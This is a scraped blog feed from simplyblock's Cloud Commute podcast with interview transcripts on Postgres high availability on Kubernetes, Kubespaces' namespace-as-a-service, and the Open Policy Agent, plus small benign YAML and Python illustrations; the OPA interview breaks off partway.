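If the gap between those two numbers, multiplied by how often you expect an outage, exceeds the extra cost of the more resilient deployment, the deployment pays for itself.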

Chris Engelbert: Exactly, that kind of thing. I think that becomes more important in the cloud age. So perfect bridge to cloud, Postgres and cloud, perfect. You said setting up HA is complicated because you have to install the tools, you have to configure them. These days, when you go and deploy Postgres on something like Kubernetes, you would have an operator claiming at least doing all the magic for you. What is your opinion on the magic?

Shaun Thomas: Yeah, so my opinion on that is it evolved a lot. Back when I first started seeing containerized systems like Docker and that kind of thing, my opinion was, I don’t know if I’d run a production system in a container, right? Because it just seems a little shady. But that was 10 years ago or more. Now that Kubernetes tools and that kind of thing have matured a lot, what you get out of this now is you get a level of automation that just is not possible using pretty much anything else. And I think what really sold it to me was – so you may have heard of Gabriele Bartolini. He basically heads up the team that writes and maintains Cloud Native Postgres, the Cloud Native PG operator. We’ll talk about operators probably a bit later. But the point of that was back when – this was before 2ndQuadrant was bought by EDB – we were selling our BDR tool for bi-directional replication for Postgres, right? So multi-master. And we needed a way to put that in a cloud service for obvious purposes so we could sell it to customers. And that meant we needed an operator. Well, before Cloud Native Postgres existed, there was the BDR operator that we were cycling internally for customers.

And one day while we were in Italy—because every employee who worked at 2ndQuadrant got sent to Italy for a couple of weeks to get oriented with the team, that kind of thing. During that time when I was there in 2020, I think I was there for February, for the first two weeks of February. He demoed that, and it kind of blew me away. We were using other tools to deploy containers. And it was basically Ansible to automate the deployment with Terraform. And then you kind of set everything up and then deploy everything. It takes minutes to set up all the packages and get everything deployed and reconfigure everything. Then you have to wait for syncs and whatnot to make sure everything’s proper.

On someone’s laptop, he set up a Kubernetes-in-Docker deployment; kind, I think, is what we were using at that point. And in less than a minute, he had set up on his laptop a full Kubernetes cluster of three replicating, bidirectionally replicating, so three multi-master nodes of Postgres. And I was just like, my mind was blown. And the thing is, basically, it’s a new concept. The data is what matters. The nodes themselves are completely unimportant. And that’s why, to kind of bring this back around, it mattered when Cloud Native Postgres was released by EnterpriseDB as kind of an open-source tool for just Postgres, without the bidirectional replication stuff.

The reason that was important was because it’s an ethos. The point is your compute nodes—throw them away. They don’t matter. If one goes down, you provision a new one. If you need to upgrade your tooling or the packages, you throw away the old container image, you bring up a new one. The important part is your data. And as long as your data is on your persistent volume claim or whatever you provision that as, the container itself, the version of Postgres you’re running, those aren’t nearly as important. So it complicates debugging to a certain extent. And we can kind of talk about that maybe later. But the important part is it brings high availability to a level that can’t really be described using the old methods. Because the old method was you create two or three replicas. And if one goes down, you’ve got a monitoring system that switches over to one of the alternates. And then the other one might come back or might not. And then you rebuild it if it does, that kind of thing.

With the Kubernetes approach or the container approach, as long as your storage wasn’t corrupted, you can just bring up a new container to represent that storage. And you can actually have a situation where the primary goes down because maybe it got OOM killed for some reason. It can actually go down, get a new container provisioned, and come back up before the monitors even notice that there was an outage and switch to a replica and promote it. There’s a whole mechanism of systems in there to kind of reduce the amount of timeline switches and other kinds of complications behind the scenes. So you have a cohesive, stable timeline. You maximize your uptime. They’ve got layers to redirect connections from the outside world through either Traefik or some other kind of proxy to get into your actual cluster. You always get an endpoint somehow, unless something went horribly wrong, but that’s true for anything. And the ethos that your machines aren’t important spoke to me a little bit, because it brings you to a new level. Sure, bare hardware is great, and I actually prefer it. I’ve got servers in my basement specifically for testing clusters and Postgres and whatnot. But if you have the luxury of provisioning what you need at the time, if I want more compute nodes, like I said, throw away my image, bring up a new one that’s got more resources allocated to it, suddenly I’ve grown vertically. And that’s something you can’t really do with bare hardware, at least not very easily.

So then I was like, well, maybe this whole container thing isn’t really a problem, right? So yeah, it’s all because of my time in 2ndQuadrant and Gabriele’s team that high availability does belong in the cloud. And you can run production in the cloud on Kubernetes and containers. And in fact, I encourage it.
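As a concrete illustration of the operator experience Shaun describes, a minimal CloudNativePG manifest looks roughly like this (field names follow the CloudNativePG v1 API; the cluster name, instance count, and storage size are just example values). The operator turns this into a primary plus replicas, and a deleted pod is simply replaced and reattached to its persistent volume:

```yaml
# cluster.yaml - a minimal CloudNativePG cluster (illustrative values)
apiVersion: postgresql.cnpg.io/v1
kind: Cluster
metadata:
  name: demo-pg
spec:
  instances: 3      # one primary, two replicas; the pods are disposable
  storage:
    size: 1Gi       # the data on the volume is what actually matters
```

Applied with `kubectl apply -f cluster.yaml`, that is essentially the whole deployment.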

Chris Engelbert: I love that. I love that. I also think high availability in cloud, and especially cloud native are concepts that are perfectly in line and perfectly in sync. Unfortunately, we’re out of time. I didn’t want to stop you, but I think we have to invite you again and keep talking about that. But one last question. One last question. By the way, I love when you said that containers were a new thing like 10 years ago, except for you came from the Solaris or BSD world where those things were –

Shaun Thomas: Jails!

Chris Engelbert: But it’s still different, right? You didn’t have this orchestration layer on top. The whole ecosystem evolved very differently in the Linux space. Anyway, last question. What do you think is the next big thing? What is upcoming in the Postgres, the Linux, the container world, what do you think is amazing on the horizon?

Shaun Thomas: I mean, I hate to be cliche here, but it’s got to be AI. If you look at pgvector, it’s basically allowing you to do vectorized similarity searches right in Postgres. And I think Timescale even released pgvectorscale, which is an extension that makes pgvector even better. It makes it apparently faster than dedicated vector databases like Pinecone. And it’s just an area that if you’re going to do any kind of retrieval-augmented generation, like RAG searches, or if you’re doing any LLM work at all, if you’re building chatbots, or if you’re just doing, like I said, augmented searches, any of that kind of work, you’re going to be wanting your data that’s in Postgres already, right? You’re going to want to make that available to your AI. And the easiest way to do that is with pgvector.

Tembo even wrote an extension we call pg_vectorize, which automatically maintains your embeddings, which is how you kind of interface your searches with the text. And then you can feed that back into an LLM. It also has the ability to do that for you. Like it can send messages directly to OpenAI. We can also interface with arbitrary paths so you can set up an Ollama or something on a server or locally. And then you can set that to be the end target. So you can even keep your messages from hitting external resources like Microsoft or OpenAI or whatever, just do it all locally. And that’s all very important. So that, I think, is going to be what everyone– well, not everyone, but a lot of people are focusing on. And a lot of people find it annoying. It’s another AI thing, right? But I wrote two blog posts on this where I wrote a RAG app using some Python and pgvector. And then I wrote a second one where I used pg_vectorize and I cut my Python code by like 90%. And it just basically talks to Postgres. Postgres is doing it all. And that’s because of the extension ecosystem, right? And that’s one of the reasons Postgres is kind of on the top of everyone’s mind right now because it’s leading the charge. And it’s bringing a lot of people in that may not have been interested before.
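For readers new to pgvector, its `<=>` operator is cosine distance, and a similarity search is just `ORDER BY embedding <=> query`. A rough plain-Python sketch of what that ranking computes follows; the three-dimensional "embeddings" and document titles are made up, since real embeddings come from an embedding model:

```python
import math

def cosine_distance(a, b):
    # What pgvector's <=> operator computes: 1 minus cosine similarity.
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return 1 - dot / norm

# Toy "document embeddings" keyed by title.
docs = {
    "postgres ha guide":    [0.9, 0.1, 0.0],
    "cooking recipes":      [0.0, 0.2, 0.9],
    "kubernetes operators": [0.7, 0.6, 0.1],
}
query = [1.0, 0.2, 0.0]

# Equivalent of: SELECT title FROM docs ORDER BY embedding <=> :query LIMIT 2;
ranked = sorted(docs, key=lambda title: cosine_distance(docs[title], query))
print(ranked[:2])  # ['postgres ha guide', 'kubernetes operators']
```

In Postgres itself this would be an index-assisted scan over a `vector` column; the point here is only what the ordering means.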

Chris Engelbert: I love that. And I think that’s a perfect sentence to end the show. The Postgres ecosystem or extension system is just incredible. And there’s so much stuff that we’ve seen so far and so much more stuff to come. I couldn’t agree more.

Shaun Thomas: Yeah, it’s just the beginning, man.

Chris Engelbert: Yeah, let’s hope that AI is not going to try to build our HA systems. And I’m happy.

Shaun Thomas: Maybe not yet, yeah.

Chris Engelbert: Yeah, not yet at least. Exactly. All right, thank you for being here. It was a pleasure. As I said, I think I have to invite you again somewhere in the future.

Shaun Thomas: More than willing.

Chris Engelbert: And to the audience, thank you for listening in again. I hope you come back next week. And thank you very much. Take care.

The post How I designed PostgreSQL High Availability with Shaun Thomas from Tembo (video + interview) appeared first on simplyblock.

Easy Developer Namespaces with Multi-tenant Kubernetes with Alessandro Vozza from Kubespaces https://www.simplyblock.io/blog/easy-developer-namespaces-with-multi-tenant-kubernetes-with-alessandro-vozza-from-kubespaces-video/ Fri, 14 Jun 2024 12:07:20 +0000 https://www.simplyblock.io/?p=253

The post Easy Developer Namespaces with Multi-tenant Kubernetes with Alessandro Vozza from Kubespaces appeared first on simplyblock.

This interview is part of simplyblock’s Cloud Commute Podcast, available on YouTube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site.

In this installment of the podcast, we’re joined by Alessandro Vozza (Twitter/X, GitHub), a prominent figure in the Kubernetes and cloud-native community, who talks about his new project, Kubespaces, which aims to simplify Kubernetes deployment by offering a namespace-as-a-service. He highlights the importance of maintaining the full feature set of Kubernetes while ensuring security and isolation for multi-tenant environments. Alessandro’s vision includes leveraging the Kubernetes API to create a seamless, cloud-agnostic deployment experience, ultimately aiming to fulfill the promises of platform engineering and serverless computing. He also discusses the future trends in Kubernetes and the significance of environmental sustainability in technology.

EP16: Easy Developer Namespaces with Multi-tenant Kubernetes with Alessandro Vozza from Kubespaces

Chris Engelbert: Hello, everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast. Today, I have another incredible guest. I know I say that every time, but he’s really incredible. He’s been around in the Kubernetes space for quite a while. And I think, Alessandro, the best way is just to introduce yourself. Who are you? What have you done in the past, and what are you doing right now?

Alessandro Vozza: Thank you for having me. Well, I’m Alessandro, yes, indeed. I’ve been around for some time in the cloud-native community. I’m Italian, from the south of Italy, and I moved to Amsterdam, where I live currently, about 20 years ago, to get my PhD in chemistry. And then after I finished my PhD, that’s my career. So I went through different phases, always around open source, of course. I’ve been an advocate for open source, and a user of open source since the beginning, since I could lay my hands on a keyboard.

That led me to various places, of course, and various projects. So I started running the DevOps meetup in Amsterdam back in the day, 10, 11 years ago. Then from there, I moved to the OpenStack project and running the OpenStack community. But when I discovered Kubernetes, and what would become the Cloud Native Computing Foundation, I started running the local meetup. And that was kind of a turning point for me. I really embraced the community and embraced the project and started working on the things. So basically what I do is organize the meetup and organize the KCDs, the Kubernetes Community Days in Amsterdam, in Utrecht, around the country. That kind of led me through a natural process to be a CNCF Ambassador, which are people that represent or are so enthusiastic about the way the Cloud Native Computing Foundation works and the community, that are naturally elected to be the face or the ambassadors for the project, for the mission.

At this moment, I still do that. It’s my honor and pleasure to serve the community, to create, to run monthly meetups and KCDs and help other communities thrive as well. So the lessons learned in the Netherlands, in the meetups and in the conferences, we try to spread them as much as possible. We are always available for other communities to help them thrive as well. So that’s been me in a nutshell. So all about community. I always say I’m an average programmer, I’m an average engineer, but where I really shine is to organize these events and to get the people together. I get a kick out of a successful event where people form connections and grow together. So that’s what drives me in my very core.

Chris Engelbert: I like how you put this. You really shine in bringing engagement to the community, helping people to shine themselves, to grow themselves. I think that is a big part of being a developer advocate or in the developer relations space in general. You love this sharing of information, helping other people to get the most out of it.

Alessandro Vozza: Actually, I used to be, or I still do play the bass, electric bass and double bass. And the bass player stays in the back next to the drummer and he creates the conditions so the other members of the band shine. So the guitar player usually stays in front, the bass player is the guy that stays back and is happy to create the foundations and cover the music to really shine. And that’s maybe my nature. So maybe it reflects from the fact that I always love playing the bass and being that guy in a band.

Chris Engelbert: I love that. That’s a great analogy. I never thought about that, but that is just brilliant. And I actually did the same thing in the past, so there may be some truth to that. So we met a few weeks ago in Amsterdam, actually at AWS Summit Amsterdam.

And I invited you because I thought you were still with the previous company, but you’re doing something new right now. So before that, you were with Solo.io , an API gateway, networking, whatever kind of thing. But you’re doing your own thing. So tell us about it.

Alessandro Vozza: Yeah. So it was a great year doing DevRel, and so much fun going and speaking about service mesh, which is something that I really believe everybody needs. I know it’s controversial, but it’s something you’ve really got to believe in. You know, when you are a developer advocate, when you represent a company or community, the passion is important. You cannot have passion for something you don’t believe in, for something that you don’t completely embrace. And that was great. And we had so much fun for about a year or a bit more. But then I decided that I’m too young to settle; like, I’m only 48, come on, I have a good 10 years of engineering work to do. So I decided that I wanted to work on something else, on something of my own, an idea that I had, and I want to see it develop.

Filling a gap in the market, and a real need for developers to have flexible environments to deploy their applications. So, fulfilling the promises of platform engineering as a self-service platform to deploy applications. The idea revolves around the namespace. What is a namespace? Of course, it’s the unit of deployment in Kubernetes, really. It’s this magical place where developers can be free and can deploy their applications without control, within the guard rails of whatever the sysadmins, the cluster administrators, set.

But developers really love freedom. So developers don’t want to have to interact even with the sysops or sysadmins. In fact, developers love Heroku. So Heroku, I think, is the hallmark of developer experience where you just can deploy whatever you want, all your code, all your applications in a place and it’s automatically exposed and you can manage by yourself everything about your application.

I want to reproduce that. I want to get inspired by that particular developer experience. But because I love Kubernetes, of course, and because I really believe that the Kubernetes APIs are the cornerstone, the golden standards of cloud-native application deployment. So I want to offer the same experience but through the Kubernetes API. So how you do that, and that’s, of course, like this evolving product, me and a bunch of people are still working on, define exactly what does it mean and how it’s going to work. But the idea is that we offer namespace-as-a-service. What really matters to developers is not the clusters, is not the VMs or the networks or all the necessary evil that you need to run namespaces. But what really matters is the namespace, is a place where they can deploy their application. So what if we could offer the best of both worlds, kind of like the promises of serverless computing, right? So you are unburdened by infrastructure. Of course, there is infrastructure somewhere, the cloud is just somebody else’s computer, right? So it’s not magic, but it feels like magic because of the clever arrangement of servers in a way that you don’t see them, but they are still there.

So imagine a clusterless Kubernetes. The experience of Kubernetes, the API really, so all the APIs that you learn to love and embrace without the burden of infrastructure. That’s the core idea.

Chris Engelbert: So that means it’s slightly different from those app platforms like Fargate or what’s the Azure and GCP ones, Cloud Run and whatever. So it’s slightly different, right? Because you’re still having everything Kubernetes offers you. You still have your CRDs or your resource definitions, but you don’t have to manage Kubernetes on its own because it’s basically a hosted platform. Is that correct?

Alessandro Vozza: Yeah. So those platforms, of course, are meant to run single individual application pods, but they don't feel like Kubernetes. For me, because I love it so much, I think developers love to learn new things too. So developers would love to have a Kubernetes cluster where they can do what they like, but without the burden of managing it. CloudRun and ACI and Fargate are great tools, of course, and you can use them to put together some infrastructure, but they're still limiting in what you can deploy. You can deploy a single container, but it's not a full-fledged Kubernetes cluster. And I think it's still crippling in a way, because you don't have the full API at your disposal; you have to go through this extra API layer. It's a bespoke API, so you've got to learn Cloud Run, you've got to learn ACI, you've got to learn Fargate, but they are not compatible with each other. They are very cloud-specific, but the Kubernetes API is cloud-agnostic, and that's what I want to build.

What we seek to build is to have a single place where you can deploy in every cloud, in every region, in some multi-region, multi-cloud, but through the same API layer, which is the pure and simple Kubernetes API.

Chris Engelbert: I can see there’s two groups of people, the ones that say, just hide all the complexity from Kubernetes. And you’re kind of on the other side, I wouldn’t say going all the way, like you want the complexity, but you want the feature set, the possibilities that Kubernetes still offers you without the complexity of operating it. That’s my feeling.

Alessandro Vozza: Yeah, the complexity lies in the operation, in the upgrades, the security. To properly secure a Kubernetes cluster takes a PhD almost, so there's a whole ecosystem dedicated to securing a cluster. But in Kubespaces, we can take care of it; we can make sure that the clusters are secure and compliant, while still offering the freedom to the developers to deploy what they need and what they like. I think we underestimate developers: they love to tinker with the platform, they love freedom, they don't want the burden of even interacting with the operations team.

And so the very proposal here is that you don’t need an operation team, you don’t need a platform engineering team, it’s all part of the platform that we offer. And you don’t even need an account in Azure or AWS, you can select which cloud and which region to deploy to completely seamlessly and without limits.

Chris Engelbert: Okay, so that means you can select, okay, I need a Kubernetes cluster namespace, whatever you want to call it, in Azure, in Frankfurt or in Western Europe, whatever they call it.

Alessandro Vozza: Yeah. Okay, so it is still a thing that people don't want to be in clouds they don't trust; if you don't want to be in Azure, you should not be forced to. So we offer several infrastructure pieces, clusters, even if the word cluster doesn't appear anywhere, because by design we don't want people to think in terms of clusters. We want people to think in terms of namespaces, and specifically tenants, which are just collections of namespaces. One namespace is not going to cut it, of course; you want to have multiple, to group them in environments like prod or test, and then assign them to your teams, so they can deploy and have fun with their namespaces and tenants.
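In plain Kubernetes terms, that grouping could be sketched as nothing more than labeled namespaces (the label keys below are made up for illustration and are not Kubespaces' actual API):

```yaml
# Two namespaces forming one hypothetical tenant, split into environments.
apiVersion: v1
kind: Namespace
metadata:
  name: team-a-prod
  labels:
    example.io/tenant: team-a        # hypothetical tenant label
    example.io/environment: prod
---
apiVersion: v1
kind: Namespace
metadata:
  name: team-a-test
  labels:
    example.io/tenant: team-a
    example.io/environment: test
```

A platform would then assign RBAC and quotas per tenant label rather than per cluster.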

Chris Engelbert: Yeah, I think there’s one other thing which is also important when you select a cloud and stuff, you may have other applications or other services already in place, and you just want to make sure that you have the lowest latency, you don’t have to pay for throughput, and stuff like that. Something that I always find complicated with hosted database platforms, to be honest, because you have to have them in the same region somehow.

Alessandro Vozza: Yeah, that’s also a political reason, right? Or commercial reason that prevents you from that.

Chris Engelbert: Fair, fair. There’s supposed to be people that love Microsoft for everything.

Alessandro Vozza: I love Microsoft, of course, been there for seven years. I’m not a fanboy, maybe I am a little, but that’s all right. Everybody, that’s why the world is a beautiful place. Everybody is entitled to his or her opinion, and that’s all right.

Chris Engelbert: I think Microsoft did a great job with the cloud, and in general with a lot of the changes they made over the last two decades. There are still teams like the Office and the Windows teams, which are probably still very enterprise-y, but all of the other ones have changed. For me specifically, the Java team at Microsoft is doing a great job, and they seem to be much more approachable and much more community-driven than the others.

Alessandro Vozza: I was so lucky because I was there, so I saw it with my own eyes, the unfolding of this war machine of Microsoft. There was this tension of beating Amazon at their own game. Seven years ago, we had this mission of really demonstrating that Microsoft was serious about open source and about cloud, and it paid off; it definitely put Microsoft back on the map. I'm proud and very, very grateful to have been there. You had Microsoft joining the Linux Foundation and the Cloud Native Computing Foundation, really being serious about Cloud Native, and now it works.

Chris Engelbert: I agree. The post-Ballmer era is definitely a different world for Microsoft. All right, let's get back to Kubespaces, because looking at the time, we're at 17 minutes already. You said it's a shared resource, I think. You see Kubernetes as a multi-tenant platform, so how does isolation work between customers? I think that is probably a good question for a lot of security-concerned people.

Alessandro Vozza: Yeah, so of course, the first incarnation will be a pure-play SaaS where you have shared tenants. I mean, it's infrastructure shared among customers; that's by design the first iteration. There will be more, probably, where we can offer dedicated clusters to specific customers. But in the beginning, it will be based on a mix of technologies between vCluster and Firecracker, which ensures better isolation of your workloads. So it is indeed one piece of infrastructure where multiple customers will throw their applications, but you won't be able to see each other. Everybody gets their own endpoint for the Kubernetes API, so you will not be able to. RBAC is great, and it works, of course, but it's arcane knowledge, and to properly do RBAC is quite difficult. So instead of risking a mistake in some cluster role or role, after which everybody can see everything, you'd better have isolation between tenants. And that comes with a popular project like vCluster, which has already been around for five years, so there's some knowledge there already.

And there's even another layer of isolation: things like Kata Containers and Firecracker provide much better isolation at the container runtime level. So even if you escape from the container, from the jail of the container, you can only see a very limited view of the world and you cannot see the rest of the infrastructure. So that's the idea of isolating workloads between customers. You could, of course, find flaws in it, but we will take care of them, and we will have all the monitoring in place to prevent that; it's a learning experience. We want to prove to ourselves first, and then to customers, that we can do this.

Chris Engelbert: Right. Okay. For the sake of time, a very, very… well, I think because you’re still building this thing out, it may be very interesting for you to talk about that. I think right now it’s most like a one person thing. So if you’re looking for somebody to help with that, now is your time to ask for people.

Alessandro Vozza: Yeah. If the ideas resonate and you want to build a product together, I do need backend engineers, front-end engineers, or just enthusiastic people that believe in the idea. It’s my first shot at building a product or building a startup. Of course, I’ve been building other businesses before, consulting and even a coworking space called Cloud Pirates. But now I want to take a shot at building a product and see how it goes. The idea is sound. There’s some real need in the market. So it’s just a matter of building it, build something that people want. So don’t start from your ideas, but just listen to what people tell you to build and see how it goes. So yeah, I’ll be very happy to talk about it and to accept other people’s ideas.

Chris Engelbert: Perfect. Last question, something I always have to ask people. What do you think will be the next big thing in Kubernetes? Is it the namespace-as-a-service or do you see anything else as well?

Alessandro Vozza: If I knew! Of course, at the last KubeCon in Paris, the trends were clear: AI. Cloud Native feeding into AI, but also AI helping Cloud Native thrive. So there's this dual relationship with Gen AI and the new trends in computing, which is very important. But of course, if you ask people, there's WebAssembly on the horizon, not replacing containers, but definitely becoming a thing. So there are trends. And that's what's great about this community and these technologies: it's never boring. There's always something new to learn, and I'm personally trying to learn every day. If it's not WebAssembly, it's something else, but I'm trying to stay updated. This is fun, and it challenges your convictions, your knowledge, every day. There's this idea from Microsoft that I learned about, the growth mindset: what you know now is never enough if you think ahead. And it's a beautiful thing to see. It's something that keeps me going every day.

Now I'm learning a lot about on-premise as well. People are also trying to move workloads back to the data centers, and there are reasons for it. And one trend is actually a very important one, and I want to shout out to the people in the Netherlands also working on it: green computing, or the environmental sustainability of software and infrastructure. Within the CNCF, there is the Technical Advisory Group for Environmental Sustainability, which we're collaborating with. We are running the Environmental Sustainability Week in October, worldwide events all around getting the software we all love and care about to run greener and leaner and less carbon-intensive. And this is not just our community; it's the whole planet involved, or at least it should concern everybody who cares about our future. I have five kids, so it matters a lot to me to leave a better place than I found it.

Chris Engelbert: I think that is a beautiful last statement, because we're running out of time. But in case you haven't seen the first episode of the podcast, that may be something for you, because we actually talked to Rich Kenny from Interact, and they work on data center sustainability, kind of doing the same thing on a hardware level. Really, really interesting stuff. Thank you very much. It was a pleasure having you. And for the audience: next week, same time, same place. I hope you're listening again. Thank you.

Alessandro Vozza: Thank you so much for having me. You’re welcome.

The post Easy Developer Namespaces with Multi-tenant Kubernetes with Alessandro Vozza from Kubespaces appeared first on simplyblock.

EP16: Easy Developer Namespaces with Multi-tenant Kubernetes with Alessandro Vozza from Kubespaces
Policy Management at Cloud-Scale with Anders Eknert from Styra (video + interview) https://www.simplyblock.io/blog/policy-management-at-cloud-scale-with-anders-eknert-from-styra-video/ Fri, 07 Jun 2024 12:09:23 +0000 https://www.simplyblock.io/?p=258 This interview is part of simplyblock's Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , Pandora , Samsung Podcasts, and our show site. In this installment of the podcast, we're joined by Anders Eknert ( Twitter/X , Personal Blog ), a Developer Advocate for Styra, who talks about the functionality of OPA, […]

The post Policy Management at Cloud-Scale with Anders Eknert from Styra (video + interview) appeared first on simplyblock.

This interview is part of simplyblock's Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , Pandora , Samsung Podcasts, and our show site.

In this installment of the podcast, we're joined by Anders Eknert ( Twitter/X , Personal Blog ), a Developer Advocate for Styra, who talks about the functionality of OPA, the Open Policy Agent project at Styra, from a developer's perspective, explaining how it integrates with services to enforce policies. The discussion touches on the broader benefits of a unified policy management system and how OPA and Styra DAS (Declarative Authorization Service) facilitate this at scale, ensuring consistency and control across complex environments. See more information below on what the Open Policy Agent project is, what 'Policy as Code' is, and what tools are available, as well as how OPA can help make simplyblock more secure. Also see the interview transcript section at the end.

EP15: Policy Management at Cloud-Scale with Anders Eknert from Styra

Key Learnings

What is the Open Policy Agent (OPA) Project?

The Open Policy Agent (OPA) is a framework designed for defining and running policies as code, decoupled from applications, for use cases like authorization or infrastructure policy. It allows organizations to maintain a unified approach to policy management across their entire technology stack. Styra, the company behind OPA, enhances its capabilities with two key products: Styra DAS and an enterprise distribution of OPA. Styra DAS is a commercial control plane for managing OPA at scale, handling the entire policy lifecycle. The enterprise distribution of OPA features a different runtime that consumes less memory, evaluates faster, and can connect to various data sources, providing more efficient and scalable policy management.

What is Policy as Code?

Policy as code is a practice where policies and rules are defined, managed, and executed using code rather than through manual processes. This approach allows policies to be versioned, tested, and automated, similar to software development practices. By treating policies as code, organizations can ensure consistency, repeatability, and transparency in their policy enforcement, making it easier to manage and audit policies across complex environments. Tools like Open Policy Agent (OPA) (see above) facilitate policy as code by providing a framework to write, manage, and enforce policies programmatically.
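A minimal sketch of the principle in plain Python (OPA itself uses its own language, Rego; this only illustrates the idea of a policy that lives in its own module and is versioned, reviewed, and unit-tested like any other code):

```python
# Illustration of "policy as code": the rule is ordinary, testable code,
# kept separate from the application that asks for the decision.

POLICY_VERSION = "1.2.0"  # policies are versioned like any other code

def allow(user: dict, action: str, resource: str) -> bool:
    """Admins may do anything; others may only read their own team's resources."""
    if "admin" in user.get("roles", []):
        return True
    return action == "read" and resource.startswith(user.get("team", "") + "/")

# And unit-tested, just like application code:
assert allow({"roles": ["admin"]}, "delete", "payments/db")
assert allow({"team": "payments"}, "read", "payments/db")
assert not allow({"team": "payments"}, "write", "payments/db")
```

Because the rule is code, a change to it is a pull request with a diff, a review, and a test run, rather than a manual process.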

What are the available Policy as Code Tools?

Several tools are available for implementing Policy as Code. Some of the prominent ones include:

  1. Open Policy Agent (OPA) : An open-source framework to write, manage, test, and enforce policies for infrastructure modifications, service communication, and access permissions. See our podcast episode with Anders Eknert from Styra .
  2. HashiCorp Sentinel : A policy as code framework deeply integrated with HashiCorp products like Terraform, Vault, and Consul.
  3. Kyverno : A Kubernetes-native policy management tool that allows you to define, validate, and enforce policies for Kubernetes resources.
  4. Azure Policy : A service in Microsoft Azure for enforcing organizational standards and assessing compliance.

These tools help ensure that policies are codified, version-controlled, and easily integrated into CI/CD pipelines, providing greater consistency and efficiency in policy management.

How will OPA help to Make Simplyblock even more Secure?

Integrating Open Policy Agent (OPA) with simplyblock and Kubernetes can enhance security in several ways:

  1. Centralized Policy Management: OPA allows defining and enforcing policies centrally, ensuring consistent security policies across all services and environments.
  2. Fine-Grained Access Control: OPA provides detailed control over who can access what, reducing the risk of unauthorized access. Policies can, for example, be used to limit access to simplyblock block devices or prevent unauthorized write mounts.
  3. Compliance and Auditing: OPA's policies can be versioned and audited, helping simplyblock meet your compliance requirements. Using simplyblock and OPA, you have proof of who was authorized to access your data storage at any point in time.
  4. Dynamic Policy Enforcement: OPA can enforce policies in real time, responding to changes quickly and preventing security breaches.
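As a hedged sketch of the "prevent unauthorized write mounts" point, here is what such a check could look like in plain Python standing in for a Rego rule. The field names follow Kubernetes pod specs, while the protected claim name `sb-vol` is purely hypothetical:

```python
# Flag containers that mount a protected persistent volume without readOnly: true.
def writable_mount_violations(pod: dict, protected_claims: set) -> list:
    # Map each volume name in the pod to the PVC claim backing it, if any.
    claims = {
        v["name"]: v["persistentVolumeClaim"]["claimName"]
        for v in pod.get("spec", {}).get("volumes", [])
        if "persistentVolumeClaim" in v
    }
    violations = []
    for container in pod.get("spec", {}).get("containers", []):
        for mount in container.get("volumeMounts", []):
            claim = claims.get(mount["name"])
            if claim in protected_claims and not mount.get("readOnly", False):
                violations.append(f"{container['name']} mounts {claim} writable")
    return violations

pod = {"spec": {
    "volumes": [{"name": "data", "persistentVolumeClaim": {"claimName": "sb-vol"}}],
    "containers": [{"name": "app", "volumeMounts": [{"name": "data"}]}],
}}
assert writable_mount_violations(pod, {"sb-vol"}) == ["app mounts sb-vol writable"]
```

In an actual deployment this kind of rule would be evaluated by OPA at admission time, not by the application itself.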

Transcript

Chris Engelbert: Hello everyone, welcome back to this week’s episode of simplyblock’s Cloud Commute Podcast. Today I have a guest with me that I actually never met in person as far as I know. I don’t think we have. No. Maybe just say a few words about you, where you’re from, who you are, and what you’re working with.

Anders Eknert: Sure, I’m Anders. I live here and work in Stockholm, Sweden. I work as a developer advocate, or a DevRel lead even, for Styra, the company behind the Open Policy Agent (OPA) project.

I’ve been here for, I think it’s three and a half years or so. Before that, I was at another company where I got involved in the OPA project. We had a need for a solution to do access control or authorization across a very diverse and complex environment. We had development teams in 12 different countries, seven different programming languages in our cluster, and it was just a big mess. Our challenge was how to do authorization in that kind of environment without having to go out to all of these teams and try to coordinate development work with each change we needed to do.

So that’s basically how I got involved in the OPA project. OPA emerged as a good solution to our problem at that time and, yeah, all these years later I’m still here and I’m having a lot of fun.

Chris Engelbert: All right, cool. So you mentioned Styra, I always thought it was Styra [Steera] to be honest, but okay, fair enough.

Anders Eknert: Yeah, no, the Swedish pronunciation would be ‘Steera’. So you’re definitely right. It is a Swedish word, which means to steer or to navigate.

Chris Engelbert: Oh, okay, yeah.

Anders Eknert: So you’re absolutely right. I’m just using the Americanized, the bastardized pronunciation.

Chris Engelbert: That’s fair, probably because I’m German that would be my initial thought. And it kind of makes sense. So in German it would probably be “steuern” or something.

All right, so tell us a little bit about Styra. You already mentioned the OPA project. I guess we’re coming back to that in a second, but maybe a little bit about the company itself.

Anders Eknert: Yeah, sure. Styra was founded by the creators of OPA and the idea, I think, is like the main thing. Everything at Styra revolves around OPA and I think it always has and I’m pretty sure it always will to some extent.

So what Styra does is we created and maintain the OPA project. We created and maintain a lot of the things you’ll find in the ecosystem around OPA and Styra. And also of course we’re a commercial company. So there are two products that are both based around OPA. One is Styra DAS, which is a commercial control plane, which allows you to manage OPA at scale. So like from the whole kind of policy lifecycle. And then there’s an enterprise distribution of OPA as well, which has basically a whole different runtime, which allows it to consume much less memory, evaluate faster, connect to various data sources and so on. So basically both the distributed component and the centralized component.

Chris Engelbert: Right, okay. You mentioned OPA a few times. I think you already mentioned what it really means, but maybe we need to dig into that a little bit deeper. So OPA is the Open Policy Agent. And if I'm not mistaken, it's a framework to actually build what we call policy as code.

Anders Eknert: That’s right, that’s right. So yeah, the idea behind OPA is basically that you define your policies as code, but not just code as like any other code running or which is kind of coupled to your applications, but rather that you try and decouple that part of your code and move it outside of your application so you can work with that in isolation.

And some common use cases could be things like authorization. And I mentioned before this need where you have like a complex environment, you have a whole bunch of services and you need to control authorization. How do we do authorization here? How do we make changes to this at runtime? How do we know what authorization decisions got logged or what people did in our systems? So how do we do auditing of this? So that is one type of policy and it’s a very common one.

